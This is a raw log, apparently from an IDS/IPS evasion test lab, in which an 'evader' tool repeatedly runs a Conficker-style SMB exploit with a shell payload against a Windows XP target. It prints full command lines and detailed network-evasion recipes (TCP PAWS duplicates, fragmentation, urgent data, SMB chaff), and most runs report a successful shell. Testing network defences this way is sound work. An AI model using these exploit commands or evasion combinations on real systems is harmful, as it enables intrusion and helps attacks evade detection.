- - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is a small NetBIOS message of an unspecified type.
- The following evasions are applied from stage msrpc_bind to end:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 205278740> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.118:46988 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ....
- 5722 runs averaging 2.00 runs / second ; progress: 2862/43200...................
- 5741 runs averaging 2.00 runs / second ; progress: 2867/43200.................
- 5758 runs averaging 2.00 runs / second ; progress: 2872/43200............
- 5770 runs averaging 2.01 runs / second ; progress: 2877/43200..........
- 5780 runs averaging 2.01 runs / second ; progress: 2882/43200..................
- 5798 runs averaging 2.01 runs / second ; progress: 2887/43200...................2015-06-08 00:07:41 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65225 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=b+LULLXLP9A --evasion=[smb_opentree,smb_openpipe]smb_decoytrees,"7","4","1645","random_msrpcbind" --evasion=[smb_openpipe,end]tcp_paws,"75%","9","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed b+LULLXLP9B
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before normal SMB writes, 7 SMB trees are opened and 4 writes are performed to them. The write payload is 1645 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.116:65225 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....
- 5822 runs averaging 2.01 runs / second ; progress: 2892/432002015-06-08 00:07:42 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14977 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=/6AH03N7Zfg --evasion=[smb_connect,end]tcp_paws,"50%","108770038","alphanumrandomized" --evasion=[msrpc_req,end]tcp_segvar,"7","30328" --verifydelay=1000 --payload=shell
- Info: Using random seed /6AH03N7Zfj
- The following evasions are applied from stage smb_connect to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 108770038> and has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - TCP packets are segmented to contain between 7 and 30328 bytes of payload.
- Info: NetBIOS connection 10.62.90.116:14977 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .................
- 5840 runs averaging 2.02 runs / second ; progress: 2897/43200..................
- 5858 runs averaging 2.02 runs / second ; progress: 2902/43200.................
- 5875 runs averaging 2.02 runs / second ; progress: 2907/43200...............2015-06-08 00:08:00 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51948 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=fl6e6aGm5+U --evasion=[smb_opentree,end]netbios_chaff,"13","empty_unspec|empty_keepalive|msrpc_req" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","92936105","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed fl6e6aGm5+V
- The following evasions are applied from stage smb_opentree to end:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 92936105> and has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.115:51948 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .......
- 5898 runs averaging 2.03 runs / second ; progress: 2912/432002015-06-08 00:08:03 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=46316 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=WPmLbVV+KN8 --evasion=[smb_openpipe,msrpc_bind]smb_fnameobf,"change_case|add_paths|add_null_trailer" --evasion=[start,end]tcp_paws,"25%","248594867","random_alphanum" --evasion=[netbios_connect,smb_opentree]tcp_paws,"2","140365635","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed WPmLbVV+KN9
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 248594867> and has random alphanumeric bytes as payload
- The following evasions are applied from stage netbios_connect to smb_opentree:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140365635> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - The SMB filename is obfuscated:
- * Random characters case is changed
- * Dummy paths are added ( a/b -> a/c/../b )
- * A 0x00 and random alphanumeric characters are appended to the filename
- Info: NetBIOS connection 10.62.90.112:46316 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..........Pid 9568 timed out - killed
- 2015-06-08 00:08:07 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=20559 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Lu/W+J+ia8E --evasion=[netbios_connect,smb_connect]tcp_urgent,"5","zero" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed Lu/W+J+ia8E
- The following evasions are applied from stage netbios_connect to smb_connect:
- - Add a zero urgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.113:20559 -> 10.35.1.207:445
- Terminated
- 5910 runs averaging 2.03 runs / second ; progress: 2917/43200........2015-06-08 00:08:10 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26515 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dmrBvWj+KHs --evasion=[start,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,msrpc_req]smb_chaff,"21","write_flag","rand" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","161045439","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed dmrBvWj+KHt
- The following evasions are applied from stage start to msrpc_req:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 161045439> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random payload
- Info: NetBIOS connection 10.62.90.112:26515 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ......
- 5925 runs averaging 2.03 runs / second ; progress: 2922/43200.2015-06-08 00:08:13 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29584 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=tYONh/AvK4Y --evasion=[smb_opentree,smb_openpipe]smb_chaff,"8","write_flag","msrpc" --evasion=[smb_connect,end]tcp_paws,"1","268435455","random_alpha" --evasion=[netbios_connect,end]tcp_recv_window,"1048575" --verifydelay=1000 --payload=shell
- Info: Using random seed tYONh/AvK4a
- The following evasions are applied from stage netbios_connect to end:
- - TCP receive window is set to at most 1048575 bytes.
- The following evasions are applied from stage smb_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Before every 8th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.112:29584 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- .....................
- 5948 runs averaging 2.03 runs / second ; progress: 2928/43200............2015-06-08 00:08:22 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26011 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=jfv1oCGsfoE --evasion=[msrpc_bind,end]tcp_paws,"50%","8","random_alpha" --evasion=[netbios_connect,smb_connect]tcp_segvar,"5","65534" --verifydelay=1000 --payload=shell
- Info: Using random seed jfv1oCGsfoG
- The following evasions are applied from stage netbios_connect to smb_connect:
- - TCP packets are segmented to contain between 5 and 65534 bytes of payload.
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.116:26011 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 5964 runs averaging 2.03 runs / second ; progress: 2933/43200................
- 5980 runs averaging 2.04 runs / second ; progress: 2938/432002015-06-08 00:08:28 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53136 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=KkbNMAGYqPk --evasion=[msrpc_bind,msrpc_req]tcp_overlap,"4","new","random_alpha" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"1","268435453","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed KkbNMAGYqPk
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
- - TCP segments are set to overlap by 4 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.116:53136 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..................
- 5999 runs averaging 2.04 runs / second ; progress: 2943/43200..2015-06-08 00:08:33 INFO
- Success. (10.62.90.112):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=62808 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Y9jHGKPdrkQ --evasion=[msrpc_req,end]smb_writeandxpad,"8","zero" --evasion=[netbios_connect,end]tcp_paws,"1","268435454","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed Y9jHGKPdrkR
- The following evasions are applied from stage netbios_connect to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - 8 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- Info: NetBIOS connection 10.62.90.112:62808 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .................................
- 6035 runs averaging 2.05 runs / second ; progress: 2948/43200....................
- 6055 runs averaging 2.05 runs / second ; progress: 2953/43200........2015-06-08 00:08:45 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47868 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=xqepctN8ai8 --evasion=[netbios_connect,msrpc_bind]ipv4_frag,"72" --evasion=[smb_opentree,msrpc_req]smb_decoytrees,"7","6","3","random_msrpcbind" --verifydelay=1000 --payload=shell
- Info: Using random seed xqepctN8ai/
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - IPv4 fragments with at most 72 bytes per fragment
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Before normal SMB writes, 7 SMB trees are opened and 6 writes are performed to them. The write payload is 3 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.118:47868 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ....2015-06-08 00:08:46 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33860 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=Ln/5ZlyjG9A --evasion=[smb_opentree,end]smb_decoytrees,"4","6","2","random_msrpcbind" --evasion=[netbios_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed Ln/5ZlyjG9A
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 4 SMB trees are opened and 6 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.113:33860 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 6078 runs averaging 2.05 runs / second ; progress: 2958/43200....
- 6082 runs averaging 2.05 runs / second ; progress: 2963/43200..........
- 6092 runs averaging 2.05 runs / second ; progress: 2968/43200...
- 6095 runs averaging 2.05 runs / second ; progress: 2973/43200........
- 6103 runs averaging 2.05 runs / second ; progress: 2978/43200.........
- 6112 runs averaging 2.05 runs / second ; progress: 2983/43200......
- 6118 runs averaging 2.05 runs / second ; progress: 2988/43200...
- 6121 runs averaging 2.04 runs / second ; progress: 2993/43200.....
- 6126 runs averaging 2.04 runs / second ; progress: 2998/43200...............
- 6141 runs averaging 2.04 runs / second ; progress: 3003/43200................
- 6157 runs averaging 2.05 runs / second ; progress: 3008/43200........
- 6165 runs averaging 2.05 runs / second ; progress: 3013/43200.
- 6166 runs averaging 2.04 runs / second ; progress: 3018/43200.......2015-06-08 00:09:52 INFO
- Success. (10.62.90.113):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=48430 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=jheLxOYHTqY --evasion=[msrpc_req,end]ipv4_opt,"3","inc","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"75%","268435454","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed jheLxOYHTqa
- The following evasions are applied from stage smb_opentree to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_req to end:
- - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- Info: NetBIOS connection 10.62.90.113:48430 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..
- 6176 runs averaging 2.04 runs / second ; progress: 3023/43200................
- 6192 runs averaging 2.04 runs / second ; progress: 3028/43200...2015-06-08 00:10:00 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30613 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=zrd64b/IIsg --evasion=[start,msrpc_req]tcp_chaff,"50%","shorthdr|longhdr","random" --evasion=[smb_opentree,end]tcp_paws,"5","52714395","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed zrd64b/IIsj
- The following evasions are applied from stage start to msrpc_req:
- - 50% probability to send TCP chaff when sending a TCP packet. The chaff packet has:
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 52714395> and has shuffled original payload
- Info: NetBIOS connection 10.62.90.116:30613 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ...
- 6199 runs averaging 2.04 runs / second ; progress: 3033/43200.......
- 6206 runs averaging 2.04 runs / second ; progress: 3038/43200....
- 6210 runs averaging 2.04 runs / second ; progress: 3044/43200........
- 6218 runs averaging 2.04 runs / second ; progress: 3049/43200
- 6218 runs averaging 2.04 runs / second ; progress: 3054/43200...2015-06-08 00:10:28 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64754 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=kJYCaqQqc2Y --evasion=[start,end]tcp_initialseq,"4294967295" --evasion=[smb_opentree,end]tcp_paws,"50%","5765228","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed kJYCaqQqc2a
- - Initial TCP sequence number is set to 0xffffffff - 4294967295
- The following evasions are applied from stage smb_opentree to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5765228> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.116:64754 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 6224 runs averaging 2.03 runs / second ; progress: 3059/43200.................
- 6241 runs averaging 2.04 runs / second ; progress: 3064/43200..........
- 6251 runs averaging 2.04 runs / second ; progress: 3069/43200
- 6251 runs averaging 2.03 runs / second ; progress: 3074/43200
- 6251 runs averaging 2.03 runs / second ; progress: 3079/43200.
- 6252 runs averaging 2.03 runs / second ; progress: 3084/43200....
- 6256 runs averaging 2.03 runs / second ; progress: 3089/43200Pid 12828 timed out - killed
- 2015-06-08 00:11:00 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22545 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=m9GqZcPtAhc --evasion=[netbios_connect,smb_openpipe]tcp_urgent,"5","random_alpha" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed m9GqZcPtAhe
- The following evasions are applied from stage netbios_connect to smb_openpipe:
- - Add a random alphaurgent data byte to every 5 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.117:22545 -> 10.35.1.207:445
- Terminated
- .
- 6258 runs averaging 2.02 runs / second ; progress: 3094/43200Pid 13136 timed out - killed
- 2015-06-08 00:11:05 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41641 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=37m4osrLY9M --evasion=[netbios_connect,end]tcp_tsoptreply,"le" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed 37m4osrLY9P
- The following evasions are applied from stage netbios_connect to end:
- - TCP timestamps echo reply value is sent in the wrong endianness
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:41641 -> 10.35.1.207:445
- Terminated
- ....
- 6263 runs averaging 2.02 runs / second ; progress: 3099/43200........
- 6271 runs averaging 2.02 runs / second ; progress: 3104/43200..........
- 6281 runs averaging 2.02 runs / second ; progress: 3109/43200........2015-06-08 00:11:22 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54476 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=BY1D6exxlwo --evasion=[start,msrpc_bind]tcp_paws,"13","10","shuffle" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"1","140207545","alphanumrandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed BY1D6exxlwo
- The following evasions are applied from stage start to msrpc_bind:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has shuffled original payload
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 140207545> and has original payload with alphanumeric bytes randomized
- Info: NetBIOS connection 10.62.90.117:54476 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..
- 6292 runs averaging 2.02 runs / second ; progress: 3114/43200.......
- 6299 runs averaging 2.02 runs / second ; progress: 3119/43200.............
- 6312 runs averaging 2.02 runs / second ; progress: 3124/43200......
- 6318 runs averaging 2.02 runs / second ; progress: 3129/43200...........
- 6329 runs averaging 2.02 runs / second ; progress: 3134/43200.2015-06-08 00:11:45 INFO
- Success. (10.62.90.117):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49441 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=z1IpDeH5f6U --evasion=[msrpc_bind,end]tcp_paws,"50%","122942823","random" --evasion=[msrpc_bind,end]tcp_urgent,"13","random" --verifydelay=1000 --payload=shell
- Info: Using random seed z1IpDeH5f6X
- The following evasions are applied from stage msrpc_bind to end:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 122942823> and has random bytes as payload
- - Add a random urgent data byte to every 13 TCP segment.
- Info: NetBIOS connection 10.62.90.117:49441 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ........
- 6339 runs averaging 2.02 runs / second ; progress: 3139/43200........
- 6347 runs averaging 2.02 runs / second ; progress: 3144/43200......
- 6353 runs averaging 2.02 runs / second ; progress: 3149/43200..
- 6355 runs averaging 2.01 runs / second ; progress: 3154/43200.
- 6356 runs averaging 2.01 runs / second ; progress: 3159/43200........
- 6364 runs averaging 2.01 runs / second ; progress: 3164/43200.......
- 6371 runs averaging 2.01 runs / second ; progress: 3169/43200
- 6371 runs averaging 2.01 runs / second ; progress: 3174/43200
- 6371 runs averaging 2.00 runs / second ; progress: 3179/43200....
- 6375 runs averaging 2.00 runs / second ; progress: 3184/43200.........
- 6384 runs averaging 2.00 runs / second ; progress: 3189/43200....
- 6388 runs averaging 2.00 runs / second ; progress: 3194/43200
- 6388 runs averaging 2.00 runs / second ; progress: 3199/43200
- 6388 runs averaging 1.99 runs / second ; progress: 3204/43200.....Pid 16099 timed out - killed
- 2015-06-08 00:12:58 INFO
- Timed out (10.62.90.110):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37388 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=ZvuU2DLSbLs --evasion=[msrpc_req,end]ipv4_opt,"8","inc","shuffle" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"4","3","1","zero" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed ZvuU2DLSbLt
- The following evasions are applied from stage smb_openpipe to end:
- - Add a random alphaurgent data byte to every 1 TCP segment.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 1 bytes of zeroes.
- The following evasions are applied from stage msrpc_req to end:
- - Every 8th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled payload
- Info: NetBIOS connection 10.62.90.110:37388 -> 10.35.1.207:445
- Terminated
- ...
- 6397 runs averaging 1.99 runs / second ; progress: 3209/43200............
- 6409 runs averaging 1.99 runs / second ; progress: 3214/43200.......
- 6416 runs averaging 1.99 runs / second ; progress: 3219/43200....2015-06-08 00:13:13 INFO
- Success. (10.62.90.118):
- /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34064 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=ecbhHa4ykX8 --evasion=[msrpc_bind,end]ipv4_frag,"1416" --evasion=[smb_connect,msrpc_req]tcp_paws,"5","238925499","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed ecbhHa4ykX9
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238925499> and has random alphanumeric bytes as payload
- The following evasions are applied from stage msrpc_bind to end:
- - IPv4 fragments with at most 1416 bytes per fragment
- Info: NetBIOS connection 10.62.90.118:34064 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- 6421 runs averaging 1.99 runs / second ; progress: 3224/43200.....
